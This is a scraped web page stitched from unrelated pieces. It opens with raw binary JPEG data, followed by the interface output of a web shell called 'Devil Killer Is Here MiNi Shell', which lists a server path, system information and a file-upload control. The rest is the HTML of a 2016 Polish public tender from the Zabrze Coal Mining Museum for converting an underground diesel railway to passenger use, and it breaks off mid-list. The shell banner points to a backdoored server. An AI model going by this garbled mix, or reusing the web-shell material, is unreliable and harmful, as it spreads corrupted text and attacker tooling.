JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160422/100830-N-2016.html

<p class="kh_header"><b>Zabrze: <BR> Numer postępowania ZP/17/MGW/2016 <BR>
Dostosowanie podwieszonej kolejki spalinowej obsługującej transport materiałów w upadowej transportowej z powierzchni przy szybie Carnall do wyrobisk Głównej Kluczowej Sztolni Dziedzicznej do przejęcia dodatkowej funkcji tj. do przewozu osób</b><br>
<b>Numer ogłoszenia: 100830 - 2016; data zamieszczenia: 22.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Górnictwa Węglowego w Zabrzu , ul. Jodłowa 59, 41-800 Zabrze, woj. śląskie, tel. 32 630 30 91, faks 32 277 11 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumgornictwa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> <BR> Numer postępowania ZP/17/MGW/2016 <BR>
Dostosowanie podwieszonej kolejki spalinowej obsługującej transport materiałów w upadowej transportowej z powierzchni przy szybie Carnall do wyrobisk Głównej Kluczowej Sztolni Dziedzicznej do przejęcia dodatkowej funkcji tj. do przewozu osób.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <BR>1) Roboty będą prowadzone w oparciu i zgodnie z Prawem Geologicznym i Górniczym.<BR>
2) Przedmiot zamówienia obejmuje: <BR>
a)	dostosowanie obecnego układu transportu materiałów realizowanego za pomocą podwieszonej kolejki spalinowej w wyrobisku pochyłym (diagonali transportowej) łączącym powierzchnię terenu z rejonem podszybia szybu Carnall do przejęcia dodatkowej funkcji tj. przewozu ludzi wraz z opracowaniem dokumentacji układu transportu w tym regulaminu transportu do przewozu ludzi,<BR>
b)	dostawa brakującego wyposażenia, zabudowanie niezbędnych instalacji w wyrobisku pochyłym    (diagonali transportowej), Głównej Kluczowej Sztolni Dziedzicznej (SKL) i na powierzchni 
w rejonie dworców osobowo-towarowych oraz uzyskanie pozwolenia właściwego organu nadzoru górniczego na oddanie do ruchu zmienionego układu transportu przewidującego przemiennie transport materiałów i jazdę ludzi w zależności od aktualnych potrzeb Zamawiającego.
Niezbędne elementy do rozbudowania istniejącego urządzenia transportowego (kabiny osobowe, wózki hamulcowe, elementy dodatkowej sygnalizacji akustycznej i świetlnej) umożliwiające poszerzenie jego obecnej funkcji o jazdę ludzi należy zainstalować w zestawie kolejki i w wyrobisku, uzyskać wszelkie decyzje, opinie, protokoły niezbędne do jego eksploatacji w sposób zgodny z przeznaczeniem i nieodpłatnie przekazać Zamawiającemu. <BR>

3)	Rozbudowa dotychczasowego urządzenia transportowego z funkcji transportu materiałów do funkcji transportu materiałów i osób przemiennie, będzie polegała na: <BR>
3.1.	Wykonaniu stacji osobowych do wsiadania i wysiadania ludzi ze środków transportowych - wraz z podjazdem dla osób niepełnosprawnych (projekt zagospodarowania stacji osobowej znajdującej się na powierzchni musi zostać uzgodniony z firmą wykonującą plan zagospodarowania terenu na powierzchni).<BR>
3.2.	Zabudowaniu urządzeń sygnalizacyjnych, ostrzegawczych i wszystkich innych elementów wyposażenia niezbędnych do prowadzenia transportu ludzi w wyrobiskach SKL. <BR>
3.3.	Dostawie i zabudowie trzech kabin ośmioosobowych do transportu ludzi (posiadających stosowne dopuszczenia) przystosowanych okresowo do przewozów osób niepełnosprawnych na wózkach inwalidzkich stosowanych w MGW (co najmniej jedna osoba niepełnosprawna na wózku 
w jednej kabinie - miejsce dla osoby niepełnosprawnej dopuszcza możliwość zmniejszenie ilość osób w kabinie)  wraz z cięgłami do połączenia kabin między sobą i do podłączenia kabin do ciągnika spalinowego, przystosowanych do przewozu ludzi po wzniosie i upadzie wyrobiska. Siedziska w kabinach powinny być wykonane w postaci sztywnych ławek, demontowane 
w miejscach dla niepełnosprawnych. <BR>
3.4.	Dostawie i zabudowie dodatkowych lamp oświetlenia stacji SO1 i SO2, w oparciu 
o opracowaną dokumentacje i zgodnie z PN. <BR>
3.5.	Dostawie i zabudowie 2 szt. wózków hamulcowych wraz z cięgłami. <BR>
3.6.	Dostawie i zabudowie przewodów do wydłużenia układu elektrycznego i hydraulicznego oraz liny bezpieczeństwa dla zabudowy w pierwszej fazie dwóch kabin i docelowo trzech kabin do przewozu ludzi. <BR>
3.7.	Zakupie urządzenia do badania siły ciągu i siły hamowania ciągnika spalinowego wraz z pełną dokumentacją tego urządzenia. <BR>
3.8.	Przystosowaniu górnej stacji urządzenia - górna stacja urządzenia poza wyrobiskiem na powierzchni terenu - do celów wsiadania ludzi, w tym osób niepełnosprawnych na wózkach inwalidzkich i załadunku materiałów. <BR>
3.9.	Przystosowaniu dolnej stacji urządzenia - dolna stacja urządzenia na końcowym poszerzonym poziomym odcinku wyrobiska Głównej Kluczowej Sztolni Dziedzicznej- dla celów wsiadania ludzi, 
w tym osób niepełnosprawnych na wózkach inwalidzkich i rozładunku materiałów. <BR>
3.10.	Przystosowaniu urządzenia do lokalnych warunków górniczych takich jak: <BR>
- maksymalne nachylenie wyrobiska 230 <BR>
- wyrobisko o przebiegu krzywoliniowym <BR>
- długość wyrobiska ok. 150mb <BR>
Uwaga. <BR>
Kompletacja gotowego urządzenia powinna pozwalać na transport przemienny: <BR>
- materiałów sypkich i masowych w pojemnikach samowyładowczych o ładowności ok. 30kN (wg obowiązującej dokumentacji), pojemniki w posiadaniu MGW, <BR>
- elementów wielkogabarytowych i dłużycowych o długości do 6 metrów - układ transportowy 
w posiadaniu, <BR>
- innych elementów o masie jednostkowej do 1000 kg - układ transportowy w posiadaniu,<BR>
- ludzi, w trzech kabinach osobowych jednorazowo obsługujących 24 osoby z możliwością transportu min. dwóch osób niepełnosprawnych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li><BR> Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 Pzp. <BR>
a)	W zakresie przedmiotu zamówienia zgodnie z zamówieniem podstawowym <BR>
45213321-9, 50800000-3, 51100000-3, 45254100-3, 34632200-8, 34942000-2, 31500000-1, 
34632100-7, 34946120-7, 51511200-9.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.33.21-9, 50.80.00.00-5, 51.10.00.00-3, 45.25.41.00-3, 34.63.22.00-8, 34.94.20.00-2, 31.50.00.00-1, 34.63.21.00-7, 34.94.61.20-7, 51.51.12.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> <BR>Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 7 000,00 PLN, (słownie: siedem tysięcy złotych) zabezpieczającego ofertę na okres 30 dni</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><BR>Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp i jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie roboty obejmujące następujący zakres:  <BR>
1)	co najmniej 1 robotę polegającą na remoncie lub przebudowie lub  budowie, rozbudowie układów transportowych z zastosowaniem kolejek podwieszanych w podziemnym zakładzie górniczym. Wartość roboty nie może być mniejsza niż 100.000,00 zł brutto. <BR>
W celu potwierdzenia spełniania przez Wykonawcę warunków w zakresie posiadania wiedzy 
i doświadczenia Wykonawca złoży dokumenty: <BR>
A)	wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju 
i wartości, daty i miejsca wykonania (Załącznik nr 3) wraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (Załączniki nr 3.(1-n). <BR>
Na potwierdzenie spełniania warunku w zakresie wiedzy i doświadczenia w wykazie Wykonawca przedstawi roboty obejmujące następujący zakres:<BR>  
1)	co najmniej 1 robotę polegającą na remoncie lub przebudowie lub  budowie, rozbudowie układów transportowych z zastosowaniem kolejek podwieszanych w podziemnym zakładzie górniczym. Wartość roboty nie może być mniejsza niż 100.000,00 zł brutto. <BR>

Przez najważniejsze roboty Zamawiający rozumie roboty niezbędne do wykazania spełnienia warunku udziału w postępowaniu.
W wykazie nie należy podawać informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie. <BR>

Uwaga: <BR>
1.	Jeżeli zakres wykonanych, robót przedstawiony w dokumencie złożonym na potwierdzenie, że robota  została wykonana należycie, jest szerszy od wymaganego przez Zamawiającego, należy w wykazie wykonanych robót podać zakres i wartość robót na potwierdzenie warunku udziału w postępowaniu w zakresie wiedzy i doświadczenia. <BR>
2.	Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym  ogłoszenie o niniejszym postępowaniu zostało zamieszczone w BZP. <BR>
3.	W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku wiedzy i doświadczenia, zobowiązany jest wykazać udział tych podmiotów w wykonaniu zamówienia. <BR>
4.	Dowodami, o których mowa w pkt. A), dotyczącymi najważniejszych robót, określającymi, czy roboty te zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone są: <BR>
1)	poświadczenie, <BR>
2)	inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1). <BR>
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty wskazane 
w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, 
o których mowa wyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp i jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia w nw. zakresie: <BR>
1)	kierownik działu górniczego w podziemnym zakładzie górniczym -    - 1 osoba, <BR>
2)	osoba wyższego dozoru ruchu w specjalności górniczej w podziemnym zakładzie górniczym- 
z 3 letnim doświadczeniem - 1 osoba, <BR>
3)	osoba średniego dozoru ruchu w specjalności górniczej w podziemnym zakładzie górniczym - 
z 3 letnim doświadczeniem w zakresie prowadzenia transportu w podziemnych wyrobiskach górniczych - 1 osoba, <BR>
4)	kierownik działu energomechanicznego w podziemnych zakładach górniczych wydobywających węgiel kamienny - 1 osoba, <BR>
5)	osoba dozoru średniego o specjalności mechanicznej - maszyn i urządzeń dołowych 
w podziemnych zakładach górniczych wydobywających węgiel kamienny - 1 osoba, <BR>
6)	osoba średniego dozoru ruchu w specjalności elektrycznej maszyn i urządzeń dołowych 
w podziemnym zakładzie górniczym - 1 osoba, <BR>
7)	osoba dozoru wyższego w specjalności bezpieczeństwo i higiena pracy w podziemnym zakładzie górniczym- 1 osoba, <BR>

lub osoby posiadające uprawnienia odpowiadające wyżej wymienionym warunkom, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
Zamawiający nie dopuszcza łączenia funkcji w przypadku posiadania więcej niż jednego 
z ww. uprawnień przez jedną osobę. <BR>

W celu potwierdzenia spełniania przez Wykonawcę warunków w zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca złoży dokumenty: <BR>

wykaz osób (Załącznik nr 4), które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami. Zamawiający wymaga, aby osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadały następujące kwalifikacje zawodowe, doświadczenie z uwzględnieniem zakresu wykonywanych przez nie czynności: <BR>
1)	kierownik działu górniczego w podziemnym zakładzie górniczym -    - 1 osoba, <BR>
2)	osoba wyższego dozoru ruchu w specjalności górniczej w podziemnym zakładzie górniczym- z 3 letnim doświadczeniem - 1 osoba,<BR>
3)	osoba średniego dozoru ruchu w specjalności górniczej w podziemnym zakładzie górniczym - z 3 letnim doświadczeniem w zakresie prowadzenia transportu w podziemnych wyrobiskach górniczych - 1 osoba, <BR>
4) 	kierownik działu energomechanicznego w podziemnych zakładach górniczych wydobywających węgiel kamienny - 1 osoba,<BR>
5)	osoba dozoru średniego o specjalności mechanicznej - maszyn i urządzeń dołowych 
w podziemnych zakładach górniczych wydobywających węgiel kamienny - 1 osoba, <BR>
6)	osoba średniego dozoru ruchu w specjalności elektrycznej maszyn i urządzeń dołowych 
w podziemnym zakładzie górniczym - 1 osoba, <BR>
7)	osoba dozoru wyższego w specjalności bezpieczeństwo i higiena pracy w podziemnym zakładzie górniczym- 1 osoba, <BR>

lub osoby posiadające uprawnienia odpowiadające wyżej wymienionym warunkom, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
Zamawiający nie dopuszcza łączenia funkcji w przypadku posiadania więcej niż jednego 
z ww. uprawnień przez jedną osobę. <BR>

Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (część A wg spisu załączników).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><BR>Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp i jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji jakości - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany terminu wykonania zamówienia, w następujących przypadkach: <BR>
a) wystąpienie wydarzenia nieprzewidywalnego, pozostającego poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się 
z umowy w jej obecnym brzmieniu; <BR>
b) konieczność wykonania zamówień dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 Pzp, których realizacja jest niezbędna dla prawidłowego wykonania oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi 
w związku z przedłużeniem tego terminu; <BR>
c) zmian istotnych przepisów prawa Unii Europejskiej lub prawa krajowego powodujących konieczność dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji zamówienia; <BR>
d) niezawinionych przez Wykonawcę opóźnień w uzyskaniu wymaganych pozwoleń, uzgodnień, decyzji lub opinii innych organów, niezbędnych do uzyskania koniecznych pozwoleń; <BR>
e) aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny, zmian obowiązujących przepisów, warunków uniemożliwiających prowadzenie robót, bezpieczeństwa pracy, a także zmian wynikających z innych nieprzewidywalnych istotnych okoliczności, których wprowadzenie będzie korzystne dla Zamawiającego; <BR>
f)   wystąpienia prac zamiennych; <BR>
g)	wydłużenia terminu w związku z faktem wystąpienia zdarzeń na które strony nie mają wpływu, 
a które uniemożliwiają przy normalnym tempie pracy wykonanie przedmiotu umowy w terminie; <BR>
h) 	wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności; <BR>
i) kolizji z zadaniami inwestycyjnymi realizowanymi przez podmioty trzecie na zlecenie zamawiającego lub zamawiającego w stopniu - który pomimo podjęcia działań zmierzających do przyspieszenia postępu robót - uniemożliwia ich zakończenie w terminie wskazanym 
w umowie. <BR>
2.	w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności: <BR>
